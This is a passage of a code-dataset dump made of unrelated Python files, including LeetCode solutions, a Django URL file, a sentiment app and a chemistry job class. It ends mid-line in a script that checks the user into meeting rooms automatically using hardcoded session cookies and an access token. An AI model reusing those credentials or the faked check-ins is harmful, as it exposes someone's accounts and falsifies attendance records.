vector')\n\tparser.add_argument('--lb', default=0.1, help='Regularization parameter for bias')\n\tparser.add_argument('--lr', default=0.01, help='Learning rate')\n\tparser.add_argument('--max_circuits', default=7, help='Maximal number of circuits to learn')\n\tparser.add_argument('--max_sets', default=4, help='Maximal number of sets to learn')\n\tparser.add_argument('--conv', default=0.0001, help='Convergence threshold')\n\n\t# Arguments related to file names to be saved\n\tparser.add_argument('--graphparas', default='', help='Parameters for building graph')\n\tparser.add_argument('--learningparas', default='', help='Parameters for learning')\n\n\treturn parser.parse_args()\n\n\n# Set parameters of string to numbers\ndef set_paras(args):\n\targs.min_u_id = int(args.min_u_id)\n\targs.max_u_id = int(args.max_u_id)\n\targs.min_i_id = int(args.min_i_id)\n\targs.max_i_id = int(args.max_i_id)\n\targs.mu = float(args.mu)\n\targs.max_r = float(args.max_r)\n\targs.min_r = float(args.min_r)\n\targs.c = float(args.c)\n\targs.ws = int(args.ws)\n\targs.wl = int(args.wl)\n\targs.alpha = float(args.alpha)\n\targs.beta = float(args.beta)\n\targs.dim = int(args.dim)\n\targs.lb = float(args.lb)\n\targs.lz = float(args.lz)\n\targs.gamma = float(args.gamma)\n\targs.max_sets = int(args.max_sets)\n\targs.max_circuits = int(args.max_circuits)\n\n\n# Define file paths and names\ndef set_files(args):\n\tdataset = args.dataset\n\targs.inputpath = '../data/%s/input/' % dataset\n\targs.graphpath = '../data/%s/graph/' % dataset\n\targs.learningpath = '../data/%s/learning/' % dataset\n\targs.graphparas = '%s' % args.c\n\targs.learningparas = '%s_%s_%s_%s_%s_%s_%s_%s_%s' % \\\n\t\t(args.alpha, args.beta, args.gamma, args.dim, args.lb, args.lz, args.lr, args.ws, args.wl)\n\n\n# Set basic info of ratings\ndef set_basic_info(args):\n\t# Read rating\n\trui = pd.read_csv(args.inputpath + 'rating.tsv', sep='\\t', names=['u', 'i', 'r'])\n\n\t# Set min and max of ids\n\targs.min_u_id = min(rui.u)\n\targs.max_u_id = max(rui.u)\n\targs.min_i_id = min(rui.i)\n\targs.max_i_id = max(rui.i)\n\n\t# Set max and min of rating\n\targs.max_r = max(rui.r)\n\targs.min_r = min(rui.r)\n\n\t# Set mu\n\targs.mu = np.average(rui.r)\n\n\n# Print the setted arguments\ndef args_to_string(args):\n\ts = \"-------------------- Arguments ---------------------\\n\"\n\ts += \"dataset = %s\\n\" % args.dataset\n\ts += \"c = %s\\n\" % args.c\n\ts += \"wl = %s\\n\" % args.wl\n\ts += \"ws = %s\\n\" % args.ws\n\ts += \"lr = %s\\n\" % args.lr\n\ts += \"dim = %s\\n\" % args.dim\n\ts += \"alpha = %s\\n\" % args.alpha\n\ts += \"beta = %s\\n\" % args.beta\n\ts += \"gamma = %s\\n\" % args.gamma\n\ts += \"lambda_z = %s\\n\" % args.lz\n\ts += \"lambda_b = %s\\n\" % args.lb\n\ts += \"-------------------- Arguments ---------------------\\n\"\n\treturn s\n\n\n# Print the arguments\ndef print_args(args):\n\tprint(args_to_string(args))\n\n\n","repo_name":"mikele700/ExplainableRecommendation","sub_path":"UniWalk-1.0/src/par.py","file_name":"par.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6203418462","text":"from argparse import ArgumentError\nfrom account import Account\n\nclass MoneyMarketAccount(Account):\n\n def __init__(self, balance):\n parent_instance = super()\n parent_instance.__init__(balance)\n if self.balance < 10000:\n raise ValueError(\"Sorry, account balance can't be less than $10000\")\n self.transactions = 0\n self.low_balance = False\n \n def withdraw(self, debit):\n if self.transactions < 6:\n if not(self.low_balance):\n if (self.balance - debit ) < 10000:\n print('Balance less than $10000; $100 fee and no more transactions')\n self.low_balance = True\n self.balance -= debit + 100\n self.transactions += 1\n else:\n self.balance -= debit\n self.transactions += 1\n else:\n print('Account below minimum; no transactions until above $10000')\n else:\n print('Maximum number of transactions (6) reached')\n\n def deposit(self, amount):\n if self.transactions < 6:\n if self.low_balance:\n self.balance += amount\n self.low_balance = False\n else:\n self.balance += amount\n self.transactions += 1\n else:\n print('Maximum number of transactions (6) reached')\n \n def add_interest(self, rate):\n interest = (self.balance * rate) / 100\n self.balance += interest\n\n def reset_transactions(self):\n self.transactions = 0 ##### Call with instance.reset_transactions()\n\n# money = MoneyMarketAccount(20000)\n# print(money.balance)\n# money.add_interest(0.25)\n# print(money.balance)\n# money.withdraw(1000)\n# print(money.transactions)\n# money.withdraw(1000)\n# print(money.transactions)\n# money.withdraw(1000)\n# print(money.transactions)\n# money.withdraw(1000)\n# print(money.transactions)\n# money.withdraw(1000)\n# print(money.transactions)\n# money.withdraw(1000)\n# print(money.transactions)\n# print(money.balance)\n# money.withdraw(1000)\n# print(money.transactions)\n# print(money.balance)\n# money.reset_transactions()\n# print(money.transactions)","repo_name":"craigbucher/oop-bank-accounts","sub_path":"money_market.py","file_name":"money_market.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5528379044","text":"\nfrom django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n\n path('', views.all_products, name='products'),\n\n path('/', views.product_detail, name='product_detail'),\n\n path('category//', views.search_category, name='search_category'),\n\n]\n","repo_name":"Code-Institute-Submissions/Portfolio-Project-5-E-commerce-Store","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15611860241","text":"##########################################\n# LeetCode – Plus One Linked List (Java)\n##########################################\n\n# Given a non-negative number represented as a singly linked list of digits, plus one to the number.\n\n# The digits are stored such that the most significant digit is at the head of the list.\n# Example:\n\n# Input:\n# 1->2->3\n\n# Output:\n# 1->2->4\n\n\n# V0\n\n# V1 \n# https://www.jiuzhang.com/solution/plus-one-linked-list/#tag-highlight-lang-python\n\n\"\"\"\nDefinition of ListNode\nclass ListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param head: the first Node\n @return: the answer after plus one\n \"\"\"\n def plusOne(self, head):\n # Write your code here\n dummy = ListNode(0)\n dummy.next = head\n l = dummy\n r = dummy\n while r.next != None:\n r = r.next\n if r.val != 9:\n l = r\n \n if r.val != 9:\n r.val += 1;\n else:\n l.val += 1\n l = l.next\n while l != None:\n l.val = 0\n l = l.next\n \n if dummy.val == 0:\n return dummy.next\n \n return dummy;\n\n# V1'\nclass Solution(object):\n def plusOne(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n my_list = []\n while head:\n my_list.append(head.val)\n head = head.__next__ \n extra = 0 \n count = 0 \n output = []\n for i in my_list[::-1]:\n if count==0:\n i = i + 1 + extra \n i = i + extra\n if i >= 10:\n i = i%10 \n extra = 1 \n else:\n extra = 0 \n output.append(i)\n count = count + 1\n if extra==1:\n output.append(1)\n return output[::-1]\n\n# V2 \n# https://github.com/apachecn/awesome-algorithm/blob/master/docs/Leetcode_Solutions/Python/369.Plus%20One%20Linked%20List.md\nclass Solution(object):\n def plusOne(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n lst = []\n cur = head \n\n while cur:\n lst.append(cur)\n cur = cur.__next__\n\n carry = 1\n for i in range(len(lst)-1,-1,-1):\n lst[i].val += carry\n if lst[i].val < 10:\n carry = 0\n break\n else:\n lst[i].val -= 10\n\n if carry == 1:\n node = ListNode(1)\n node.next = head\n return node\n else:\n return head \n\n# V3 \n# Time: O(n)\n# Space: O(1)\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\n# Two pointers solution.\nclass Solution(object):\n def plusOne(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head:\n return None\n\n dummy = ListNode(0)\n dummy.next = head\n\n left, right = dummy, head\n while right.__next__:\n if right.val != 9:\n left = right\n right = right.__next__\n\n if right.val != 9:\n right.val += 1\n else:\n left.val += 1\n right = left.__next__\n while right:\n right.val = 0\n right = right.__next__\n\n return dummy if dummy.val else dummy.__next__\n\n\n# V4 \n# Time: O(n)\n# Space: O(1)\nclass Solution2(object):\n def plusOne(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n def reverseList(head):\n dummy = ListNode(0)\n curr = head\n while curr:\n dummy.next, curr.next, curr = curr, dummy.next, curr.next\n return dummy.__next__\n\n rev_head = reverseList(head)\n curr, carry = rev_head, 1\n while curr and carry:\n curr.val += carry\n carry = curr.val / 10\n curr.val %= 10\n if carry and curr.__next__ is None:\n curr.next = ListNode(0)\n curr = curr.__next__\n\n return reverseList(rev_head)\n","repo_name":"yennanliu/CS_basics","sub_path":"leetcode_python/Linked_list/plus-one-linked-list.py","file_name":"plus-one-linked-list.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"54"} +{"seq_id":"13506894956","text":"import streamlit as st\nimport pandas as pd\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\nfrom transformers import Trainer\nimport numpy as np\n\nif selection == 'Sentiment':\n st.title(\"Sentiment Analysis\")\n\n uploaded_file = st.file_uploader(\"Choose an Excel file\", type=['xlsx'])\n\n if uploaded_file is not None:\n df = pd.read_excel(uploaded_file)\n \n local_csv_dataset = df[['text']]\n pred_texts = local_csv_dataset.dropna().astype('str')\n pred_texts = pred_texts['text'].tolist()\n \n model_name = \"siebert/sentiment-roberta-large-english\"\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n model = AutoModelForSequenceClassification.from_pretrained(model_name)\n trainer = Trainer(model=model)\n \n tokenized_texts = tokenizer(pred_texts, truncation=True, padding=True)\n \n class SimpleDataset:\n def __init__(self, tokenized_texts):\n self.tokenized_texts = tokenized_texts\n \n def __len__(self):\n return len(self.tokenized_texts[\"input_ids\"])\n \n def __getitem__(self, idx):\n return {k: v[idx] for k, v in self.tokenized_texts.items()}\n \n pred_dataset = SimpleDataset(tokenized_texts)\n predictions = trainer.predict(pred_dataset)\n preds = predictions.predictions.argmax(-1)\n labels = pd.Series(preds).map(model.config.id2label)\n scores = (np.exp(predictions[0]) / np.exp(predictions[0]).sum(-1, keepdims=True)).max(1)\n sentiment = pd.DataFrame(list(zip(pred_texts, preds, labels, scores)), columns=['text', 'Prediction', 'Label', 'Score'])\n \n # Display the sentiment analysis results\n st.write(sentiment)\n","repo_name":"Majozi/nlp_project","sub_path":"sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31664741901","text":"\"\"\"\r\nFunções (def) em python - *args **kwargs\r\nParte 3\r\n\"\"\"\r\n\r\n# Args: Serve quando não sabemos quantos argumentos colocar na função. Serve parar empacotamente e desempacotamento.\r\n\r\n\r\n# def func(*args):\r\n# print(args)\r\n#\r\n#\r\n# lista = [1, 2, 3, 4, 5]\r\n# n1, n2, *n = lista\r\n# print(n1, n2, n)\r\n\r\n# Neste caso estou desempacotando os valores da lista sendo n1 = 1, n2 = 2, e n = [3, 4, 5] (restante da lista)\r\n\r\n# Agora vou copiar o exemplo do professor explicando que *args é uma tupla empacotada.\r\n\r\n# def func (*args): # Se tornam uma tupla\r\n# print(args) # Tupla impressa empacotada\r\n# print(args[0]) # Acessando o primeiro valor da tupla\r\n# print(args[-1]) # Acessando o ultimo valor da tupla\r\n# print(len(args)) # Imprimindo o comprimento da tupla\r\n#\r\n#\r\n# func(1, 2, 3, 4, 5) # Valores para a função\r\n\r\n# É possivel fazer cast de uma tupla para lista com sintaxe args = list(args).\r\n\r\n# Exemplo de iteração dentro da função\r\n\r\n\r\n# def func(*args):\r\n# for v in args:\r\n# print(v)\r\n#\r\n#\r\n# func(1, 2, 3, 4, 5)\r\n\r\n# kwargs são para argumentos nomeados e diiferentemente dos args, kwargs acompanham 2 \"*\"\r\n\r\n# def func(**kwargs):\r\n# print(kwargs['nome'], kwargs['sobrenome'])\r\n#\r\n#\r\n# func(nome='kilder', sobrenome='colvalan')\r\n\r\n# .get para verificar se argumento existe.\r\n\r\n\r\ndef func(**kwargs):\r\n\r\n nome = kwargs.get('nome')\r\n\r\n if nome is not None:\r\n print(nome)\r\n else:\r\n print('Nome inexistente')\r\n\r\n\r\nfunc(nome='Kilder')\r\n","repo_name":"Colvalan/Meu_Aprendizado","sub_path":"modulo_intermediario/aulas/aula3.py","file_name":"aula3.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71242595361","text":"# -*- coding: utf-8 -*-\n__copyright__ = \"\"\" This code is licensed under the 3-clause BSD license.\nCopyright ETH Zurich, Laboratory of Physical Chemistry, Reiher Group.\nSee LICENSE.txt for details.\n\"\"\"\n\nfrom scine_puffin.config import Configuration\nfrom .templates.job import calculation_context, job_configuration_wrapper\nfrom .templates.scine_connectivity_job import ConnectivityJob\n\n\nclass ScineBondOrders(ConnectivityJob):\n \"\"\"\n A job calculating bond orders.\n\n **Order Name**\n ``scine_bond_orders``\n\n **Optional Settings**\n Optional settings are read from the ``settings`` field, which is part of\n any ``Calculation`` stored in a SCINE Database.\n Possible settings for this job are:\n\n only_distance_connectivity :: bool\n Whether the bond orders shall be constructed via distance information only (True)\n or from an electronic structure calculation (False). (default: False)\n add_based_on_distance_connectivity :: bool\n If ``True``, the structure's connectivity is derived from interatomic\n distances via the utils.BondDetector: The bond orders used for\n interpretation are set to the maximum between those given by an electronic structure\n calculation and 1.0, whereever the utils.BondDetector\n detects a bond. (default: True)\n sub_based_on_distance_connectivity :: bool\n If ``True``, the structure's connectivity is derived from interatomic\n distances via the utils.BondDetector: The bond orders used given by an electronic structure\n calculation are removed, whereever the utils.BondDetector does not\n detect a bond. (default: True)\n add_graph :: bool\n Whether to add a molassembler graph and decision list to the structure\n based on the determined bond orders. (default: True)\n\n All settings that are recognized by the SCF program chosen.\n\n Common examples are:\n\n max_scf_iterations :: int\n The number of allowed SCF cycles until convergence.\n\n **Required Packages**\n - SCINE: Database (present by default)\n - SCINE: molassembler (present by default)\n - SCINE: Readuct (present by default)\n - SCINE: Utils (present by default)\n - A program implementing the SCINE Calculator interface, e.g. Sparrow\n\n **Generated Data**\n If successful the following data will be generated and added to the\n database:\n\n Properties\n The ``bond_orders`` (``SparseMatrixProperty``) are added.\n Optionally the ``electronic_energy`` associated with the structure if it\n is present in the results of provided by the calculator interface.\n Other\n If a graph is requested, graph representations of the structure will be\n added to the structures ``graphs`` field. The added representations are:\n A representation of the graph ``masm_cbor_graph``, and the decision\n representations of the existing stereopermutators using a nearest\n neighbour fit ``masm_decision_list``.\n Any previous graph representations of the structure will be overwritten.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.name = \"Scine Bond Order Job\"\n\n @job_configuration_wrapper\n def run(self, manager, calculation, config: Configuration) -> bool:\n\n import scine_database as db\n import scine_readuct as readuct\n\n # Get structure\n structure = db.Structure(calculation.get_structures()[0], self._structures)\n settings_manager, program_helper = self.create_helpers(structure)\n settings_manager.separate_settings(calculation.get_settings())\n\n # Get connectivity settings and remove them from settings passed to readuct\n self.extract_connectivity_settings_from_dict(settings_manager.task_settings)\n add_graph = settings_manager.task_settings.pop(\"add_graph\", True)\n\n # actual calculation\n success = False # success might not be set if something throws in context -> ensure it exists in scope\n with calculation_context(self):\n # Distance based bond orders\n if self.connectivity_settings[\"only_distance_connectivity\"]:\n bond_orders = self.distance_bond_orders(structure)\n # Bond order calculation with readuct\n else:\n systems, keys = settings_manager.prepare_readuct_task(\n structure,\n calculation,\n settings_manager.task_settings,\n config[\"resources\"],\n )\n if program_helper is not None:\n program_helper.calculation_preprocessing(\n systems[keys[0]], settings_manager.task_settings\n )\n systems, success = readuct.run_single_point_task(\n systems, keys, require_bond_orders=True, **settings_manager.task_settings\n )\n\n self.throw_if_not_successful(success, systems, keys)\n bond_orders = systems[keys[0]].get_results().bond_orders\n\n # Graph generation\n if add_graph:\n self.add_graph(structure, bond_orders)\n\n # There are no results if the bond orders are purely distance based\n if self.connectivity_settings[\"only_distance_connectivity\"]:\n self.verify_connection()\n self.capture_raw_output()\n else:\n self.sp_postprocessing(\n success, systems, keys, structure, program_helper\n )\n\n # Store bond orders\n self.store_property(\n self._properties,\n \"bond_orders\",\n \"SparseMatrixProperty\",\n bond_orders.matrix,\n calculation.get_model(),\n calculation,\n structure,\n )\n\n return self.postprocess_calculation_context()\n","repo_name":"qcscine/puffin","sub_path":"scine_puffin/jobs/scine_bond_orders.py","file_name":"scine_bond_orders.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"7035524167","text":"import argparse\nimport torch\nimport models\nimport datasets\n\n# Argument parsing\nparser = argparse.ArgumentParser(description=\"Sentiment analysis through Yelp reviews.\")\nparser.add_argument('--enable-cuda', action='store_true', help='Enable CUDA')\nparser.add_argument('--visualize', action='store_true', help='Enable visdom visualization')\nparser.add_argument('--load-path', action='store', help='Path to checkpoint file for evaluation.')\nparser.add_argument('--data-path', action='store', help='Path to dataset.')\nparser.add_argument('--text', action='store', help='Text for live evaluation.')\nparser.add_argument('--port', action='store', help='Port when using live evaluation server')\nparser.add_argument('--host', action='store', help='Host when using live evaluation server')\nargs = parser.parse_args()\n\nEPOCHS = 10\nLEARNING_RATE = 0.001\nBATCH_SIZE = 100\nGPU = torch.cuda.is_available()\n\nMODEL = {\n \"model\": models.PureGRU,\n \"embedding_dim\": 50,\n \"input_size\": 50,\n \"hidden_size\": 128,\n \"num_layers\": 1,\n \"kernel_size\": 5,\n \"intermediate_size\": 32,\n \"dropout\": 0.0,\n}\n\nDATASET = datasets.GlovePretrained50d\nDATA_KWARGS = {\n \"glove_path\": \"glove.6B.50d.txt\"\n}\n\nVISUALIZE = args.visualize\nCHECKPOINT_DIR = \"checkpoints\"\n\nGPU = torch.cuda.is_available() and args.enable_cuda\nHIST_OPTS = dict(numbins=20,\n xtickmin=0,\n xtickmax=6)\n","repo_name":"Demborg/LSTM_sentiment","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"29395336918","text":"# -*- coding: utf-8 -*-\nimport time\nimport datetime\nfrom api.api import API\nfrom utility.device_info_util import DeviceInfoUtil\nfrom pages.android.common.super_page import SuperPage\nfrom pages.android.shanghu.lefuzhangdan_page_configs import LeFuZhangDanPageConfigs as LFZDPC\nfrom pages.logger import logger\n\n\nclass LeFuZhangDanPage(SuperPage):\n '''\n 作者 乔佳溪\n 订单管理\n '''\n def __init__(self, testcase, driver, logger):\n super(LeFuZhangDanPage, self).__init__(testcase, driver, logger)\n\n def validSelf(self):\n '''\n usage: 验证乐付账单\n '''\n logger.info(\"Check 乐付账单 begin\")\n API().assertElementByText(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.text_user_defined,\n LFZDPC.verify_timeout)\n logger.info(\"Check 乐付账单 end\")\n\n def clickOnUserDefined(self):\n '''\n usage: 点击自定义\n '''\n logger.info(\"Click 自定义 begin\")\n API().clickElementByText(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.text_user_defined,\n LFZDPC.verify_timeout)\n logger.info(\"Click 自定义 end\")\n\n def validCalendar(self):\n '''\n usage: 验证日历\n '''\n logger.info(\"Check 日历 begin\")\n API().assertElementByText(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.text_calendar_start,\n LFZDPC.verify_timeout)\n\n API().assertElementByText(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.text_calendar_end,\n LFZDPC.verify_timeout)\n logger.info(\"Check 日历 end\")\n\n def clickOnStartDate(self):\n '''\n usage: 选择当前日期的前一天\n '''\n logger.info(\"Click 自定义 begin\")\n logger.info(\"Click 自定义查询时间 begin\")\n version = DeviceInfoUtil().getBuildVersion()\n date = time.strftime('%Y-%m-%d').split('-')\n yesDate = datetime.datetime.now() - datetime.timedelta(days = 1)\n beforeDate = yesDate.strftime('%Y-%m-%d').split('-')\n\n if date[2] == '01':\n day = date[2]\n else:\n day = beforeDate[2]\n\n if int(version.split(\".\")[0]) < 5:\n if date[1] == '01':\n month = u\"一月\"\n elif date[1] == '02':\n month = u\"二月\"\n elif date[1] == '03':\n month = u\"三月\"\n elif date[1] == '04':\n month = u\"四月\"\n elif date[1] == '05':\n month = u\"五月\"\n elif date[1] == '06':\n month = u\"六月\"\n elif date[1] == '07':\n month = u\"七月\"\n elif date[1] == '08':\n month = u\"八月\"\n elif date[1] == '09':\n month = u\"九月\"\n elif date[1] == '10':\n month = u\"十月\"\n elif date[1] == '11':\n month = u\"十一月\"\n elif date[1] == '12':\n month = u\"十二月\"\n else:\n if date[1] == '01':\n month = u\"January\"\n elif date[1] == '02':\n month = u\"February\"\n elif date[1] == '03':\n month = u\"March\"\n elif date[1] == '04':\n month = u\"April\"\n elif date[1] == '05':\n month = u\"May\"\n elif date[1] == '06':\n month = u\"June\"\n elif date[1] == '07':\n month = u\"July\"\n elif date[1] == '08':\n month = u\"August\"\n elif date[1] == '09':\n month = u\"September\"\n elif date[1] == '10':\n month = u\"October\"\n elif date[1] == '11':\n month = u\"November\"\n elif date[1] == '12':\n month = u\"December\"\n\n startDate = date[0] + '-' + date[1] + '-' + day\n\n if date[2] == '01':\n clickStartDate = day + \" \" + month + \" \" + date[0] + \" selected\"\n else:\n clickStartDate = day + \" \" + month + \" \" + date[0]\n\n API().clickElementByContentDesc(self.testcase,\n self.driver,\n self.logger,\n clickStartDate,\n LFZDPC.verify_timeout)\n logger.info(\"Click 自定义查询时间 end\")\n\n if int(version.split(\".\")[0]) < 5:\n logger.info(\"Click 确定 Button begin\")\n API().clickElementByText(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.text_confirm,\n LFZDPC.verify_timeout)\n logger.info(\"Click 确定 Button end\")\n else:\n logger.info(\"Click 确定 Button begin\")\n API().clickElementByText(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.text_confirm_ok,\n LFZDPC.verify_timeout)\n logger.info(\"Click 确定 Button end\")\n logger.info(\"Click 自定义 end\")\n\n return startDate\n\n def validSeachDate(self, startDate = \"default\"):\n '''\n usage: 验证查询日期\n '''\n logger.info(\"Check 查询日期 begin\")\n searchDate = API().getTextByResourceId(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.resouce_id_search_date,\n LFZDPC.verify_timeout)\n\n searchEndDate = time.strftime('%Y-%m-%d')\n\n if(startDate.split('-')[2] == \"01\") and (searchEndDate.split('-')[2] == \"01\"):\n searchContent = u\"查询时间 : \" + startDate\n else:\n searchContent = u\"查询时间 : \" + startDate + u\"至\" + searchEndDate\n\n API().assertEqual(self.testcase,\n self.logger,\n searchDate,\n searchContent)\n logger.info(\"Check 查询日期 end\")\n\n def validOrderInfo(self):\n '''\n usage: 验证订单信息\n '''\n logger.info(\"Check 订单信息 begin\")\n data = API().validElementByText(self.driver,\n self.logger,\n LFZDPC.text_pay_type,\n LFZDPC.verify_timeout)\n\n if data:\n payType = API().getElementsByResourceId(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.resource_id_type,\n LFZDPC.verify_timeout)\n API().assertEqual(self.testcase, self.logger, payType, LFZDPC.text_lefu_pay)\n logger.info(\"Check 订单信息 end\")\n","repo_name":"liu111xiao111/UItest","sub_path":"pages/android/shanghu/lefuzhangdan_page.py","file_name":"lefuzhangdan_page.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2045493535","text":"from Course.models import Course\nimport re\n\nclass CreateCourse:\n\n \"\"\"\n This method will create a course given a list of strings, \"command\"\n command[0] = createCourse\n command[1] = courseName\n command[2] = courseNumber\n command[3] = campus/online\n command[4] = daysOfWeek\n command[5] = start time\n command[6] = endTime\n\n If given valid values, the course will be created and added to the database. A confirmation\n message will be returned. If any arguments are invalid, an error message will be returned.\n \"\"\"\n\n def createCourse(self, command):\n\n # Check that the command has the appropriate number of arguments\n if len(command) != 7:\n return \"Your command is missing arguments, please enter your command in the following form: \" \\\n \"createCourse courseName courseNumber onCampus daysOfWeek start end\"\n\n # Course number checks\n if not re.match('^[0-9]*$', command[2]):\n return \"Course number must be numeric and three digits long\"\n if len(command[2]) != 3:\n return \"Course number must be numeric and three digits long\"\n # Check that the course does not already exist\n if Course.objects.filter(number=command[2]).exists():\n return \"Course already exists\"\n # Location checks\n if command[3].lower() != \"online\" and command[3].lower() != \"campus\":\n return \"Location is invalid, please enter campus or online.\"\n # Days check\n for i in command[4]:\n if i not in 'MTWRFN':\n return \"Invalid days of the week, please enter days in the format: MWTRF or NN for online\"\n # Check times\n startTime = command[5]\n endTime = command[6]\n if len(startTime) != 4 or len(endTime) != 4:\n return \"Invalid start or end time, please use a 4 digit military time representation\"\n if not re.match('^[0-2]*$', startTime[0]) or not re.match('^[0-1]*$', endTime[0]):\n return \"Invalid start or end time, please use a 4 digit military time representation\"\n for i in range (1,3):\n if not (re.match('^[0-9]*$', startTime[i])) or not (re.match('^[0-9]*$', endTime[i])):\n return \"Invalid start or end time, please use a 4 digit military time representation\"\n\n # Else the course is ok to be created\n else:\n c = Course(name=command[1], number=command[2])\n if command[3].lower() == \"online\":\n c.onCampus = False\n else:\n c.onCampus = True\n c.classDays = command[4]\n c.classHoursStart = command[5]\n c.classHoursEnd = command[6]\n c.save()\n return \"Course successfully created\"\n","repo_name":"mblahnik/Project","sub_path":"Course/CreateCourse.py","file_name":"CreateCourse.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26439715493","text":"# 0 1 2 3 4\nlistaEstudiantes = [\"ana\", \"juan\", \"maria\", \"pedro\", \"lady\"]\n\n## Ciclo for accedienda directamente a la lista\n#for estudiante in listaEstudiantes:\n# print (\"Hola \", estudiante)\n\nindices = [0,1,2,3,4]\n\n## Ciclo for a travéz de una lista de indices \"manual\" \n#for i in indices:\n# estudiante = listaEstudiantes [i]\n# print (\"Hola \", estudiante)\n\n## Ciclo for a traves de una lista automática \"range\"\nfor i in range (0,5):\n estudiante = listaEstudiantes [i]\n print (\"Hola \", estudiante)\n","repo_name":"lgarreta/lgcursos","sub_path":"MinTIC2021/ciclo01-python/semana4/ejemplos/lista-estudiantes.py","file_name":"lista-estudiantes.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5906324101","text":"# --*-- coding: utf-8 --*--\n# from urllib import request\n\nimport requests\nfrom requests.packages import urllib3\nimport json\nimport time\nfrom datetime import datetime\nurllib3.disable_warnings()\n\nurl_201='https://cal.corp.kuaishou.com/e/calendar/meetingroom/scanCode/fcABC7Rl0G_109VffUMCNsKDa'\nurl_204='https://cal.corp.kuaishou.com/e/calendar/meetingroom/scanCode/fcADlilf7F6A58RAUOhZsxHzy'\nurl_205='https://cal.corp.kuaishou.com/e/calendar/meetingroom/scanCode/fcADktjRpmQcoofqkx0sZFbRX'\nurl1='https://home.corp.kuaishou.com/api/home/block?blockName=calendarStrokeViewDTO'\nurl_msg='https://is.corp.kuaishou.com/wx/message/send?access_token=ACE94AC400DAD05B82B375FA5CD59965'\n\nheader1={\n'Cookie': 'accessproxy_session=1463632a-ab85-4886-bd9a-367ac1cbbdbd; k-token=89e3d52c8ca0089c278695faab422c79;'\n\n}\n\nheader2={\n'Cookie': '_did=web_894943991EC8551C; KXID=8kv0UjInJNsoW27gI4CvZJltTzNxYtTLtJIEPO25GBtPpTiRLa-RNj1ZyUr7lu9Pi44lAjT-sEXj-fNnqfgKNYpcUvRfnioSQhpFNwT-23UVCuzRoP7OpNzoLW8iqN_Y; accessproxy_session=7a6d06c1-f477-4218-b4c4-91b2feb763e5;'\n\n}\n\n\ndef msg_send(content):\n body={\n \"touser\" : \"wangyaxing03\",\n \"msgtype\" : \"text\",\n \"text\" : {\n \"content\" : content\n },\n \"safe\":0\n }\n header_msg={\n 'Content-Type':'application/json'\n\n }\n requests.post(url_msg,headers=header_msg,data=json.dumps(body),verify=False)\n \ndef job(): \n try:\n html=requests.get(url1,headers=header1,verify=False).text\n json_res = json.loads(html)\n # print(json_res)\n date_pattern = \"%Y年%m月%d日%H:%M\"\n mettings = json_res['calendarStrokeDetailViewDTOS']\n for m in mettings:\n # print(m['meetingDate'])\n if(m['spot'] is None):\n continue\n date=datetime.strptime(m['meetingDate']+m['beginTime'], date_pattern)\n if(0==datetime.now().day-date.day):\n if((datetime.now()-date).seconds<=600 or (datetime.now()-date).seconds>=86100):\n # print((datetime.now()-date).seconds)\n if('201' in m['spot']):\n html=requests.get(url_201,headers=header2,verify=False).text\n if(html.find(\"201 关雎\")>0):\n string=datetime.now().strftime(date_pattern)+' '+m['topic']+ m['spot']+'已签到'\n print(string)\n msg_send(string)\n else:\n try:\n raise NameError(\"cookie过期\")\n except NameError:\n msg_send('cookie过期')\n elif('204' in m['spot']):\n html=requests.get(url_204,headers=header2,verify=False).text\n if(html.find(\"204 汉广\")>0):\n string=datetime.now().strftime(date_pattern)+' '+m['topic']+ m['spot']+'已签到'\n print(string)\n msg_send(string)\n else:\n try:\n raise NameError(\"cookie过期\")\n except NameError:\n msg_send('cookie过期')\n elif('205' in m['spot']):\n html=requests.get(url_205,headers=header2,verify=False).text\n if(html.find(\"205 麟之\")>0):\n 